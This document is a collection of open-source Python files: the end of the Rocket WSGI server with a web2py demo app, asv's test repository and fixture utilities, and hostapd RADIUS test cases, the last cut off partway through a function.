self.error = ('500 Internal Server Error',
'WSGI applications must return a list or '
'generator type.')
if hasattr(output, '__len__'):
sections = len(output)
for data in output:
# Don't send headers until body appears
if data:
self.write(data, sections)
if self.chunked:
# If chunked, send our final chunk length
self.conn.sendall(b('0\r\n\r\n'))
elif not self.headers_sent:
# Send headers if the body was empty
self.send_headers('', sections)
# Don't capture exceptions here. The Worker class handles
# them appropriately.
finally:
if __debug__:
self.err_log.debug('Finally closing output and sock_file')
if hasattr(output,'close'):
output.close()
sock_file.close()
# Monolithic build...end of module: rocket\methods\wsgi.py
#
# the following code is not part of Rocket but was added in web2py for testing purposes
#
def demo_app(environ, start_response):
global static_folder
import os
types = {'htm': 'text/html','html': 'text/html','gif': 'image/gif',
'jpg': 'image/jpeg','png': 'image/png','pdf': 'applications/pdf'}
if static_folder:
if not static_folder.startswith('/'):
static_folder = os.path.join(os.getcwd(),static_folder)
path = os.path.join(static_folder, environ['PATH_INFO'][1:] or 'index.html')
type = types.get(path.split('.')[-1],'text')
if os.path.exists(path):
try:
data = open(path,'rb').read()
start_response('200 OK', [('Content-Type', type)])
except IOError:
start_response('404 NOT FOUND', [])
data = '404 NOT FOUND'
else:
start_response('500 INTERNAL SERVER ERROR', [])
data = '500 INTERNAL SERVER ERROR'
else:
start_response('200 OK', [('Content-Type', 'text/html')])
data = '<html><body><h1>Hello from Rocket Web Server</h1></body></html>'
return [data]
def demo():
from optparse import OptionParser
parser = OptionParser()
parser.add_option("-i", "--ip", dest="ip",default="127.0.0.1",
help="ip address of the network interface")
parser.add_option("-p", "--port", dest="port",default="8000",
help="post where to run web server")
parser.add_option("-s", "--static", dest="static",default=None,
help="folder containing static files")
(options, args) = parser.parse_args()
global static_folder
static_folder = options.static
print 'Rocket running on %s:%s' % (options.ip, options.port)
r=Rocket((options.ip,int(options.port)),'wsgi', {'wsgi_app':demo_app})
r.start()
if __name__=='__main__':
demo()
|
tools.py
|
# Licensed under a 3-clause BSD style license - see LICENSE.rst
# -*- coding: utf-8 -*-
from __future__ import absolute_import, division, unicode_literals, print_function
"""
This file contains utilities to generate test repositories.
"""
import datetime
import io
import os
import threading
import time
import six
import tempfile
import textwrap
import sys
import shutil
import subprocess
from os.path import abspath, join, dirname, relpath, isdir
from contextlib import contextmanager
from hashlib import sha256
from six.moves import SimpleHTTPServer
import pytest
try:
import hglib
except ImportError as exc:
hglib = None
import asv
from asv import util
from asv import commands
from asv import config
from asv import environment
from asv import runner
from asv.commands.preview import create_httpd
from asv.repo import get_repo
from asv.results import Results
from asv.plugins.conda import _find_conda
# Two Python versions for testing
PYTHON_VER1 = "{0[0]}.{0[1]}".format(sys.version_info)
if sys.version_info < (3,):
PYTHON_VER2 = "3.6"
else:
PYTHON_VER2 = "2.7"
# Installable library versions to use in tests
DUMMY1_VERSION = "0.14"
DUMMY2_VERSIONS = ["0.3.7", "0.3.9"]
WIN = (os.name == "nt")
try:
util.which('pypy')
HAS_PYPY = True
except (RuntimeError, IOError):
HAS_PYPY = hasattr(sys, 'pypy_version_info') and (sys.version_info[:2] == (2, 7))
try:
# Conda can install required Python versions on demand
_find_conda()
HAS_CONDA = True
except (RuntimeError, IOError):
HAS_CONDA = False
try:
import virtualenv
HAS_VIRTUALENV = True
except ImportError:
HAS_VIRTUALENV = False
try:
util.which('python{}'.format(PYTHON_VER2))
HAS_PYTHON_VER2 = True
except (RuntimeError, IOError):
HAS_PYTHON_VER2 = False
try:
import selenium
from selenium.common.exceptions import TimeoutException
HAVE_WEBDRIVER = True
except ImportError:
HAVE_WEBDRIVER = False
WAIT_TIME = 20.0
from lockfile import LockFile
def get_default_environment_type(conf, python):
return environment.get_environment_class(conf, python).tool_name
@contextmanager
def locked_cache_dir(config, cache_key, timeout=900, tag=None):
base_dir = config.cache.makedir(cache_key)
lockfile = join(six.text_type(base_dir), 'lock')
cache_dir = join(six.text_type(base_dir), 'cache')
lock = LockFile(lockfile)
lock.acquire(timeout=timeout)
try:
# Clear cache dir contents if it was generated with different
# asv version
tag_fn = join(six.text_type(base_dir), 'tag.json')
tag_content = [asv.__version__, repr(tag)]
if os.path.isdir(cache_dir):
try:
if util.load_json(tag_fn) != tag_content:
raise ValueError()
except (IOError, ValueError, util.UserError):
shutil.rmtree(cache_dir)
if not os.path.isdir(cache_dir):
os.makedirs(cache_dir)
yield cache_dir
util.write_json(tag_fn, tag_content)
finally:
lock.release()
def run_asv(*argv, **kwargs):
parser, subparsers = commands.make_argparser()
args = parser.parse_args(argv)
return args.func(args, **kwargs)
def run_asv_with_conf(conf, *argv, **kwargs):
assert isinstance(conf, config.Config)
parser, subparsers = commands.make_argparser()
args = parser.parse_args(argv)
if sys.version_info[0] >= 3:
cls = args.func.__self__
else:
cls = args.func.im_self
return cls.run_from_conf_args(conf, args, **kwargs)
# These classes are defined here, rather than using asv/plugins/git.py
# and asv/plugins/mercurial.py since here we need to perform write
# operations to the repository, and the others should be read-only for
# safety.
class Git(object):
def __init__(self, path):
self.path = abspath(path)
self._git = util.which('git')
self._fake_date = datetime.datetime.now()
def run_git(self, args, chdir=True, **kwargs):
if chdir:
cwd = self.path
else:
cwd = None
kwargs['cwd'] = cwd
return util.check_output(
[self._git] + args, **kwargs)
def init(self):
self.run_git(['init'])
self.run_git(['config', 'user.email', 'robot@asv'])
self.run_git(['config', 'user.name', 'Robotic Swallow'])
def commit(self, message, date=None):
if date is None:
self._fake_date += datetime.timedelta(seconds=1)
date = self._fake_date
self.run_git(['commit', '--date', date.isoformat(),
'-m', message])
def tag(self, number):
self.run_git(['tag', '-a', '-m', 'Tag {0}'.format(number),
'tag{0}'.format(number)])
def add(self, filename):
self.run_git(['add', relpath(filename, self.path)])
def checkout(self, branch_name, start_commit=None):
args = ["checkout"]
if start_commit is not None:
args.extend(["-b", branch_name, start_commit])
else:
args.append(branch_name)
self.run_git(args)
def merge(self, branch_name, commit_message=None):
self.run_git(["merge", "--no-ff", "--no-commit", "-X", "theirs", branch_name])
if commit_message is None:
commit_message = "Merge {0}".format(branch_name)
self.commit(commit_message)
def get_hash(self, name):
return self.run_git(['rev-parse', name]).strip()
def get_branch_hashes(self, branch=None):
if branch is None:
branch = "master"
return [x.strip() for x in self.run_git(['rev-list', branch]).splitlines()
if x.strip()]
def get_commit_message(self, commit_hash):
return self.run_git(["log", "-n", "1", "--format=%s", commit_hash]).strip()
_hg_config = """
[ui]
username = Robotic Swallow <robot@asv>
"""
class Hg(object):
encoding = 'utf-8'
def __init__(self, path):
self._fake_date = datetime.datetime.now()
self.path = abspath(path)
self._repo = None
def __del__(self):
if self._repo is not None:
self._repo.close()
self._repo = None
def init(self):
hglib.init(self.path)
with io.open(join(self.path, '.hg', 'hgrc'), 'w', encoding="utf-8") as fd:
fd.write(_hg_config)
self._repo = hglib.open(self.path.encode(sys.getfilesystemencoding()),
encoding=self.encoding)
def commit(self, message, date=None):
if date is None:
self._fake_date += datetime.timedelta(seconds=1)
date = self._fake_date
date = "{0} 0".format(util.datetime_to_timestamp(date))
self._repo.commit(message.encode(self.encoding),
date=date.encode(self.encoding))
def tag(self, number):
self._fake_date += datetime.timedelta(seconds=1)
date = "{0} 0".format(util.datetime_to_timestamp(self._fake_date))
self._repo.tag(
['tag{0}'.format(number).encode(self.encoding)],
message="Tag {0}".format(number).encode(self.encoding),
date=date.encode(self.encoding))
def add(self, filename):
self._repo.add([filename.encode(sys.getfilesystemencoding())])
def checkout(self, branch_name, start_commit=None):
if start_commit is not None:
self._repo.update(start_commit.encode(self.encoding))
self._repo.branch(branch_name.encode(self.encoding))
else:
self._repo.update(branch_name.encode(self.encoding))
def merge(self, branch_name, commit_message=None):
self._repo.merge(branch_name.encode(self.encoding),
tool=b"internal:other")
if commit_message is None:
commit_message = "Merge {0}".format(branch_name)
self.commit(commit_message)
def get_hash(self, name):
log = self._repo.log(name.encode(self.encoding), limit=1)
if log:
return log[0][1].decode(self.encoding)
return None
def get_branch_hashes(self, branch=None):
if branch is None:
branch = "default"
log = self._repo.log('sort(ancestors({0}), -rev)'.format(branch).encode(self.encoding))
return [entry[1].decode(self.encoding) for entry in log]
def get_commit_message(self, commit_hash):
return self._repo.log(commit_hash.encode(self.encoding))[0].desc.decode(self.encoding)
def copy_template(src, dst, dvcs, values):
for root, dirs, files in os.walk(src):
for dir in dirs:
src_path = join(root, dir)
dst_path = join(dst, relpath(src_path, src))
if not isdir(dst_path):
os.makedirs(dst_path)
for file in files:
src_path = join(root, file)
dst_path = join(dst, relpath(src_path, src))
try:
with io.open(src_path, 'r', encoding='utf-8') as fd:
content = fd.read()
except UnicodeDecodeError:
# File is some sort of binary file... just copy it
# directly with no template substitution
with io.open(src_path, 'rb') as fd:
content = fd.read()
with io.open(dst_path, 'wb') as fd:
fd.write(content)
else:
content = content.format(**values)
with io.open(dst_path, 'w', encoding='utf-8') as fd:
fd.write(content)
dvcs.add(dst_path)
def generate_test_repo(tmpdir, values=[0], dvcs_type='git',
extra_branches=(), subdir=''):
"""
Generate a test repository
Parameters
----------
tmpdir
Repository directory
values : list
List of values to substitute in the template
dvcs_type : {'git', 'hg'}
What dvcs to use
extra_branches : list of (start_commit, branch_name, values)
Additional branches to generate in the repository.
For branch start commits, use relative references, e.g.,
the format 'master~10' or 'default~10' works both for Hg
and Git.
subdir
A relative subdirectory inside the repository to copy the
test project into.
Returns
-------
dvcs : Git or Hg
"""
if dvcs_type == 'git':
dvcs_cls = Git
elif dvcs_type == 'hg':
dvcs_cls = Hg
else:
raise ValueError("Unknown dvcs type {0}".format(dvcs_type))
template_path = join(dirname(__file__), 'test_repo_template')
if not os.path.isdir(tmpdir):
os.makedirs(tmpdir)
dvcs_path = tempfile.mkdtemp(prefix='test_repo', dir=tmpdir)
dvcs = dvcs_cls(dvcs_path)
dvcs.init()
project_path = os.path.join(dvcs_path, subdir)
if not os.path.exists(project_path):
os.makedirs(project_path)
for i, value in enumerate(values):
mapping = {
'version': i,
'dummy_value': value
}
copy_template(template_path, project_path, dvcs, mapping)
dvcs.commit("Revision {0}".format(i))
dvcs.tag(i)
if extra_branches:
for start_commit, branch_name, values in extra_branches:
dvcs.checkout(branch_name, start_commit)
for i, value in enumerate(values):
mapping = {
'version': "{0}".format(i),
'dummy_value': value
}
copy_template(template_path, project_path, dvcs, mapping)
dvcs.commit("Revision {0}.{1}".format(branch_name, i))
return dvcs
def generate_repo_from_ops(tmpdir, dvcs_type, operations):
if dvcs_type == 'git':
dvcs_cls = Git
elif dvcs_type == 'hg':
dvcs_cls = Hg
else:
raise ValueError("Unknown dvcs type {0}".format(dvcs_type))
template_path = join(dirname(__file__), 'test_repo_template')
if not os.path.isdir(tmpdir):
os.makedirs(tmpdir)
dvcs_path = tempfile.mkdtemp(prefix='test_repo', dir=tmpdir)
dvcs = dvcs_cls(dvcs_path)
dvcs.init()
version = 0
for op in operations:
if op[0] == "commit":
copy_template(template_path, dvcs_path, dvcs, {
"version": version,
"dummy_value": op[1],
})
version += 1
dvcs.commit("Revision {0}".format(version), *op[2:])
elif op[0] == "checkout":
dvcs.checkout(*op[1:])
elif op[0] == "merge":
dvcs.merge(*op[1:])
else:
raise ValueError("Unknown dvcs operation {0}".format(op))
return dvcs
def generate_result_dir(tmpdir, dvcs, values, branches=None):
result_dir = join(tmpdir, "results")
os.makedirs(result_dir)
html_dir = join(tmpdir, "html")
machine_dir = join(result_dir, "tarzan")
os.makedirs(machine_dir)
if branches is None:
branches = [None]
conf = config.Config.from_json({
'results_dir': result_dir,
'html_dir': html_dir,
'repo': dvcs.path,
'project': 'asv',
'branches': branches or [None],
})
repo = get_repo(conf)
util.write_json(join(machine_dir, "machine.json"), {
'machine': 'tarzan',
'version': 1,
})
timestamp = datetime.datetime.utcnow()
benchmark_version = sha256(os.urandom(16)).hexdigest()
params = None
param_names = None
for commit, value in values.items():
if isinstance(value, dict):
params = value["params"]
result = Results({"machine": "tarzan"}, {}, commit,
repo.get_date_from_name(commit), "2.7", None, {})
value = runner.BenchmarkResult(
result=[value],
samples=[None],
number=[None],
errcode=0,
stderr='',
profile=None)
result.add_result({"name": "time_func", "version": benchmark_version, "params": []},
value, started_at=timestamp, duration=1.0)
result.save(result_dir)
if params:
param_names = ["param{}".format(k) for k in range(len(params))]
util.write_json(join(result_dir, "benchmarks.json"), {
"time_func": {
"name": "time_func",
"params": params or [],
"param_names": param_names or [],
"version": benchmark_version,
}
}, api_version=2)
return conf
@pytest.fixture(scope="session")
def browser(request, pytestconfig):
"""
Fixture for Selenium WebDriver browser interface
"""
driver_str = pytestconfig.getoption('webdriver')
if driver_str == "None":
pytest.skip("No webdriver selected for tests (use --webdriver).")
# Evaluate the options
def FirefoxHeadless():
options = selenium.webdriver.FirefoxOptions()
options.add_argument("-headless")
return selenium.webdriver.Firefox(options=options)
def ChromeHeadless():
options = selenium.webdriver.ChromeOptions()
options.add_argument('headless')
return selenium.webdriver.Chrome(options=options)
ns = {}
six.exec_("import selenium.webdriver", ns)
six.exec_("from selenium.webdriver import *", ns)
ns['FirefoxHeadless'] = FirefoxHeadless
ns['ChromeHeadless'] = ChromeHeadless
create_driver = ns.get(driver_str, None)
if create_driver is None:
src = "def create_driver():\n"
src += textwrap.indent(driver_str, " ")
six.exec_(src, ns)
create_driver = ns['create_driver']
# Create the browser
browser = create_driver()
# Set timeouts
browser.set_page_load_timeout(WAIT_TIME)
browser.set_script_timeout(WAIT_TIME)
# Clean up on fixture finalization
def fin():
browser.quit()
request.addfinalizer(fin)
# Set default time to wait for AJAX requests to complete
browser.implicitly_wait(WAIT_TIME)
return browser
@contextmanager
def preview(base_path):
"""
Context manager for ASV preview web server. Gives the base URL to use.
Parameters
----------
base_path : str
Path to serve files from
"""
class Handler(SimpleHTTPServer.SimpleHTTPRequestHandler):
def translate_path(self, path):
# Don't serve from cwd, but from a different directory
path = SimpleHTTPServer.SimpleHTTPRequestHandler.translate_path(self, path)
path = os.path.join(base_path, os.path.relpath(path, os.getcwd()))
return util.long_path(path)
httpd, base_url = create_httpd(Handler)
def run():
try:
httpd.serve_forever()
except:
import traceback
traceback.print_exc()
finally:
httpd.server_close()
thread = threading.Thread(target=run)
thread.daemon = True
thread.start()
try:
yield base_url
finally:
# Stop must be run in a separate thread, because
# httpd.shutdown blocks until serve_forever returns. We don't
# want to block here --- it appears in some environments
# problems shutting down the server may arise.
stopper = threading.Thread(target=httpd.shutdown)
stopper.daemon = True
stopper.start()
stopper.join(5.0)
def get_with_retry(browser, url):
for j in range(2):
try:
return browser.get(url)
except TimeoutException:
time.sleep(2)
return browser.get(url)
@pytest.fixture
def dummy_packages(request, monkeypatch):
"""
Build dummy wheels for required packages and set PIP_FIND_LINKS + CONDARC
"""
to_build = [('asv_dummy_test_package_1', DUMMY1_VERSION)]
to_build += [('asv_dummy_test_package_2', ver) for ver in DUMMY2_VERSIONS]
tag = [PYTHON_VER1, PYTHON_VER2, to_build, HAS_CONDA]
with locked_cache_dir(request.config, "asv-wheels", timeout=900, tag=tag) as cache_dir:
wheel_dir = os.path.abspath(join(six.text_type(cache_dir), 'wheels'))
monkeypatch.setenv(str('PIP_FIND_LINKS'), str('file://' + wheel_dir))
condarc = join(wheel_dir, 'condarc')
monkeypatch.setenv(str('CONDARC'), str(condarc))
if os.path.isdir(wheel_dir):
return
tmpdir = join(six.text_type(cache_dir), "tmp")
if os.path.isdir(tmpdir):
shutil.rmtree(tmpdir)
os.makedirs(tmpdir)
try:
os.makedirs(wheel_dir)
_build_dummy_wheels(tmpdir, wheel_dir, to_build, build_conda=HAS_CONDA)
except:
shutil.rmtree(wheel_dir)
raise
# Conda packages were installed in a local channel
if not WIN:
wheel_dir_str = "file://{0}".format(wheel_dir)
else:
wheel_dir_str = wheel_dir
with open(condarc, 'w') as f:
f.write("channels:\n"
"- defaults\n"
"- {0}".format(wheel_dir_str))
def _build_dummy_wheels(tmpdir, wheel_dir, to_build, build_conda=False):
# Build fake wheels for testing
for name, version in to_build:
build_dir = join(tmpdir, name + '-' + version)
os.makedirs(build_dir)
with open(join(build_dir, 'setup.py'), 'w') as f:
f.write("from setuptools import setup; "
"setup(name='{name}', version='{version}', packages=['{name}'])"
"".format(name=name, version=version))
os.makedirs(join(build_dir, name))
with open(join(build_dir, name, '__init__.py'), 'w') as f:
f.write("__version__ = '{0}'".format(version))
subprocess.check_call([sys.executable, '-mpip', 'wheel',
'--build-option=--universal',
'-w', wheel_dir,
'.'],
cwd=build_dir)
if build_conda:
_build_dummy_conda_pkg(name, version, build_dir, wheel_dir)
def _build_dummy_conda_pkg(name, version, build_dir, dst):
# Build fake conda packages for testing
from asv.plugins.conda import _conda_lock
build_dir = os.path.abspath(build_dir)
with open(join(build_dir, 'meta.yaml'), 'w') as f:
f.write(textwrap.dedent("""\
package:
name: "{name}"
version: "{version}"
source:
path: {build_dir}
build:
number: 0
script: "python -m pip install . --no-deps --ignore-installed "
requirements:
host:
- pip
- python
run:
- python
about:
license: BSD
summary: Dummy test package
""".format(name=name,
version=version,
build_dir=util.shlex_quote(build_dir))))
conda = _find_conda()
for pyver in [PYTHON_VER1, PYTHON_VER2]:
with _conda_lock():
subprocess.check_call([conda, 'build',
'--output-folder=' + dst,
'--no-anaconda-upload',
'--python=' + pyver,
'.'],
cwd=build_dir)
|
test_radius.py
|
# RADIUS tests
# Copyright (c) 2013-2016, Jouni Malinen <j@w1.fi>
#
# This software may be distributed under the terms of the BSD license.
# See README for more details.
from remotehost import remote_compatible
import binascii
import hashlib
import hmac
import logging
logger = logging.getLogger()
import os
import select
import struct
import subprocess
import threading
import time
import hostapd
from utils import HwsimSkip, require_under_vm, skip_with_fips, alloc_fail, fail_test, wait_fail_trigger
from test_ap_hs20 import build_dhcp_ack
from test_ap_ft import ft_params1
def connect(dev, ssid, wait_connect=True):
dev.connect(ssid, key_mgmt="WPA-EAP", scan_freq="2412",
eap="PSK", identity="psk.user@example.com",
password_hex="0123456789abcdef0123456789abcdef",
wait_connect=wait_connect)
@remote_compatible
def test_radius_auth_unreachable(dev, apdev):
"""RADIUS Authentication server unreachable"""
params = hostapd.wpa2_eap_params(ssid="radius-auth")
params['auth_server_port'] = "18139"
hapd = hostapd.add_ap(apdev[0], params)
connect(dev[0], "radius-auth", wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"])
if ev is None:
raise Exception("Timeout on EAP start")
logger.info("Checking for RADIUS retries")
time.sleep(4)
mib = hapd.get_mib()
if "radiusAuthClientAccessRequests" not in mib:
raise Exception("Missing MIB fields")
if int(mib["radiusAuthClientAccessRetransmissions"]) < 1:
raise Exception("Missing RADIUS Authentication retransmission")
if int(mib["radiusAuthClientPendingRequests"]) < 1:
raise Exception("Missing pending RADIUS Authentication request")
def test_radius_auth_unreachable2(dev, apdev):
"""RADIUS Authentication server unreachable (2)"""
subprocess.call(['ip', 'ro', 'replace', '192.168.213.17', 'dev', 'lo'])
params = hostapd.wpa2_eap_params(ssid="radius-auth")
params['auth_server_addr'] = "192.168.213.17"
params['auth_server_port'] = "18139"
hapd = hostapd.add_ap(apdev[0], params)
subprocess.call(['ip', 'ro', 'del', '192.168.213.17', 'dev', 'lo'])
connect(dev[0], "radius-auth", wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"])
if ev is None:
raise Exception("Timeout on EAP start")
logger.info("Checking for RADIUS retries")
time.sleep(4)
mib = hapd.get_mib()
if "radiusAuthClientAccessRequests" not in mib:
raise Exception("Missing MIB fields")
logger.info("radiusAuthClientAccessRetransmissions: " + mib["radiusAuthClientAccessRetransmissions"])
def test_radius_auth_unreachable3(dev, apdev):
"""RADIUS Authentication server initially unreachable, but then available"""
subprocess.call(['ip', 'ro', 'replace', 'blackhole', '192.168.213.18'])
params = hostapd.wpa2_eap_params(ssid="radius-auth")
params['auth_server_addr'] = "192.168.213.18"
hapd = hostapd.add_ap(apdev[0], params)
connect(dev[0], "radius-auth", wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"])
if ev is None:
raise Exception("Timeout on EAP start")
subprocess.call(['ip', 'ro', 'del', 'blackhole', '192.168.213.18'])
time.sleep(0.1)
dev[0].request("DISCONNECT")
hapd.set('auth_server_addr_replace', '127.0.0.1')
dev[0].request("RECONNECT")
dev[0].wait_connected()
def test_radius_acct_unreachable(dev, apdev):
"""RADIUS Accounting server unreachable"""
params = hostapd.wpa2_eap_params(ssid="radius-acct")
params['acct_server_addr'] = "127.0.0.1"
params['acct_server_port'] = "18139"
params['acct_server_shared_secret'] = "radius"
hapd = hostapd.add_ap(apdev[0], params)
connect(dev[0], "radius-acct")
logger.info("Checking for RADIUS retries")
time.sleep(4)
mib = hapd.get_mib()
if "radiusAccClientRetransmissions" not in mib:
raise Exception("Missing MIB fields")
if int(mib["radiusAccClientRetransmissions"]) < 2:
raise Exception("Missing RADIUS Accounting retransmissions")
if int(mib["radiusAccClientPendingRequests"]) < 2:
raise Exception("Missing pending RADIUS Accounting requests")
def test_radius_acct_unreachable2(dev, apdev):
"""RADIUS Accounting server unreachable(2)"""
subprocess.call(['ip', 'ro', 'replace', '192.168.213.17', 'dev', 'lo'])
params = hostapd.wpa2_eap_params(ssid="radius-acct")
params['acct_server_addr'] = "192.168.213.17"
params['acct_server_port'] = "18139"
params['acct_server_shared_secret'] = "radius"
hapd = hostapd.add_ap(apdev[0], params)
subprocess.call(['ip', 'ro', 'del', '192.168.213.17', 'dev', 'lo'])
connect(dev[0], "radius-acct")
logger.info("Checking for RADIUS retries")
time.sleep(4)
mib = hapd.get_mib()
if "radiusAccClientRetransmissions" not in mib:
raise Exception("Missing MIB fields")
if int(mib["radiusAccClientRetransmissions"]) < 1 and int(mib["radiusAccClientPendingRequests"]) < 1:
raise Exception("Missing pending or retransmitted RADIUS Accounting requests")
def test_radius_acct_unreachable3(dev, apdev):
"""RADIUS Accounting server initially unreachable, but then available"""
require_under_vm()
subprocess.call(['ip', 'ro', 'replace', 'blackhole', '192.168.213.18'])
as_hapd = hostapd.Hostapd("as")
as_mib_start = as_hapd.get_mib(param="radius_server")
params = hostapd.wpa2_eap_params(ssid="radius-acct")
params['acct_server_addr'] = "192.168.213.18"
params['acct_server_port'] = "1813"
params['acct_server_shared_secret'] = "radius"
hapd = hostapd.add_ap(apdev[0], params)
connect(dev[0], "radius-acct")
subprocess.call(['ip', 'ro', 'del', 'blackhole', '192.168.213.18'])
time.sleep(0.1)
dev[0].request("DISCONNECT")
hapd.set('acct_server_addr_replace', '127.0.0.1')
dev[0].request("RECONNECT")
dev[0].wait_connected()
time.sleep(1)
as_mib_end = as_hapd.get_mib(param="radius_server")
req_s = int(as_mib_start['radiusAccServTotalResponses'])
req_e = int(as_mib_end['radiusAccServTotalResponses'])
if req_e <= req_s:
raise Exception("Unexpected RADIUS server acct MIB value")
def test_radius_acct_unreachable4(dev, apdev):
"""RADIUS Accounting server unreachable and multiple STAs"""
params = hostapd.wpa2_eap_params(ssid="radius-acct")
params['acct_server_addr'] = "127.0.0.1"
params['acct_server_port'] = "18139"
params['acct_server_shared_secret'] = "radius"
hapd = hostapd.add_ap(apdev[0], params)
for i in range(20):
connect(dev[0], "radius-acct")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
def test_radius_acct(dev, apdev):
"""RADIUS Accounting"""
as_hapd = hostapd.Hostapd("as")
as_mib_start = as_hapd.get_mib(param="radius_server")
params = hostapd.wpa2_eap_params(ssid="radius-acct")
params['acct_server_addr'] = "127.0.0.1"
params['acct_server_port'] = "1813"
params['acct_server_shared_secret'] = "radius"
params['radius_auth_req_attr'] = [ "126:s:Operator", "77:s:testing",
"62:d:1" ]
params['radius_acct_req_attr'] = [ "126:s:Operator", "62:d:1",
"77:s:testing" ]
hapd = hostapd.add_ap(apdev[0], params)
connect(dev[0], "radius-acct")
dev[1].connect("radius-acct", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PAX", identity="test-class",
password_hex="0123456789abcdef0123456789abcdef")
dev[2].connect("radius-acct", key_mgmt="WPA-EAP",
eap="GPSK", identity="gpsk-cui",
password="abcdefghijklmnop0123456789abcdef",
scan_freq="2412")
logger.info("Checking for RADIUS counters")
count = 0
while True:
mib = hapd.get_mib()
if int(mib['radiusAccClientResponses']) >= 3:
break
time.sleep(0.1)
count += 1
if count > 10:
raise Exception("Did not receive Accounting-Response packets")
if int(mib['radiusAccClientRetransmissions']) > 0:
raise Exception("Unexpected Accounting-Request retransmission")
as_mib_end = as_hapd.get_mib(param="radius_server")
req_s = int(as_mib_start['radiusAccServTotalRequests'])
req_e = int(as_mib_end['radiusAccServTotalRequests'])
if req_e < req_s + 2:
raise Exception("Unexpected RADIUS server acct MIB value")
acc_s = int(as_mib_start['radiusAuthServAccessAccepts'])
acc_e = int(as_mib_end['radiusAuthServAccessAccepts'])
if acc_e < acc_s + 1:
raise Exception("Unexpected RADIUS server auth MIB value")
def test_radius_acct_non_ascii_ssid(dev, apdev):
"""RADIUS Accounting and non-ASCII SSID"""
params = hostapd.wpa2_eap_params()
params['acct_server_addr'] = "127.0.0.1"
params['acct_server_port'] = "1813"
params['acct_server_shared_secret'] = "radius"
ssid2 = "740665007374"
params['ssid2'] = ssid2
hostapd.add_ap(apdev[0], params)
dev[0].connect(ssid2=ssid2, key_mgmt="WPA-EAP", scan_freq="2412",
eap="PSK", identity="psk.user@example.com",
password_hex="0123456789abcdef0123456789abcdef")
def test_radius_acct_pmksa_caching(dev, apdev):
"""RADIUS Accounting with PMKSA caching"""
as_hapd = hostapd.Hostapd("as")
as_mib_start = as_hapd.get_mib(param="radius_server")
params = hostapd.wpa2_eap_params(ssid="radius-acct")
params['acct_server_addr'] = "127.0.0.1"
params['acct_server_port'] = "1813"
params['acct_server_shared_secret'] = "radius"
hapd = hostapd.add_ap(apdev[0], params)
connect(dev[0], "radius-acct")
dev[1].connect("radius-acct", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PAX", identity="test-class",
password_hex="0123456789abcdef0123456789abcdef")
for d in [ dev[0], dev[1] ]:
d.request("REASSOCIATE")
d.wait_connected(timeout=15, error="Reassociation timed out")
count = 0
while True:
mib = hapd.get_mib()
if int(mib['radiusAccClientResponses']) >= 4:
break
time.sleep(0.1)
count += 1
if count > 10:
raise Exception("Did not receive Accounting-Response packets")
if int(mib['radiusAccClientRetransmissions']) > 0:
raise Exception("Unexpected Accounting-Request retransmission")
as_mib_end = as_hapd.get_mib(param="radius_server")
req_s = int(as_mib_start['radiusAccServTotalRequests'])
req_e = int(as_mib_end['radiusAccServTotalRequests'])
if req_e < req_s + 2:
raise Exception("Unexpected RADIUS server acct MIB value")
acc_s = int(as_mib_start['radiusAuthServAccessAccepts'])
acc_e = int(as_mib_end['radiusAuthServAccessAccepts'])
if acc_e < acc_s + 1:
raise Exception("Unexpected RADIUS server auth MIB value")
def test_radius_acct_interim(dev, apdev):
"""RADIUS Accounting interim update"""
as_hapd = hostapd.Hostapd("as")
params = hostapd.wpa2_eap_params(ssid="radius-acct")
params['acct_server_addr'] = "127.0.0.1"
params['acct_server_port'] = "1813"
params['acct_server_shared_secret'] = "radius"
params['radius_acct_interim_interval'] = "1"
hapd = hostapd.add_ap(apdev[0], params)
connect(dev[0], "radius-acct")
logger.info("Checking for RADIUS counters")
as_mib_start = as_hapd.get_mib(param="radius_server")
time.sleep(4.1)
as_mib_end = as_hapd.get_mib(param="radius_server")
req_s = int(as_mib_start['radiusAccServTotalRequests'])
req_e = int(as_mib_end['radiusAccServTotalRequests'])
if req_e < req_s + 3:
raise Exception("Unexpected RADIUS server acct MIB value (req_e=%d req_s=%d)" % (req_e, req_s))
def test_radius_acct_interim_unreachable(dev, apdev):
"""RADIUS Accounting interim update with unreachable server"""
params = hostapd.wpa2_eap_params(ssid="radius-acct")
params['acct_server_addr'] = "127.0.0.1"
params['acct_server_port'] = "18139"
params['acct_server_shared_secret'] = "radius"
params['radius_acct_interim_interval'] = "1"
hapd = hostapd.add_ap(apdev[0], params)
start = hapd.get_mib()
connect(dev[0], "radius-acct")
logger.info("Waiting for interium accounting updates")
time.sleep(3.1)
end = hapd.get_mib()
req_s = int(start['radiusAccClientTimeouts'])
req_e = int(end['radiusAccClientTimeouts'])
if req_e < req_s + 2:
raise Exception("Unexpected RADIUS server acct MIB value")
def test_radius_acct_interim_unreachable2(dev, apdev):
"""RADIUS Accounting interim update with unreachable server (retry)"""
params = hostapd.wpa2_eap_params(ssid="radius-acct")
params['acct_server_addr'] = "127.0.0.1"
params['acct_server_port'] = "18139"
params['acct_server_shared_secret'] = "radius"
# Use long enough interim update interval to allow RADIUS retransmission
# case (3 seconds) to trigger first.
params['radius_acct_interim_interval'] = "4"
hapd = hostapd.add_ap(apdev[0], params)
start = hapd.get_mib()
connect(dev[0], "radius-acct")
logger.info("Waiting for interium accounting updates")
time.sleep(7.5)
end = hapd.get_mib()
req_s = int(start['radiusAccClientTimeouts'])
req_e = int(end['radiusAccClientTimeouts'])
if req_e < req_s + 2:
raise Exception("Unexpected RADIUS server acct MIB value")
def test_radius_acct_ipaddr(dev, apdev):
"""RADIUS Accounting and Framed-IP-Address"""
try:
_test_radius_acct_ipaddr(dev, apdev)
finally:
subprocess.call(['ip', 'link', 'set', 'dev', 'ap-br0', 'down'],
stderr=open('/dev/null', 'w'))
subprocess.call(['brctl', 'delbr', 'ap-br0'],
stderr=open('/dev/null', 'w'))
def _test_radius_acct_ipaddr(dev, apdev):
params = { "ssid": "radius-acct-open",
'acct_server_addr': "127.0.0.1",
'acct_server_port': "1813",
'acct_server_shared_secret': "radius",
'proxy_arp': '1',
'ap_isolate': '1',
'bridge': 'ap-br0' }
hapd = hostapd.add_ap(apdev[0], params, no_enable=True)
try:
hapd.enable()
except:
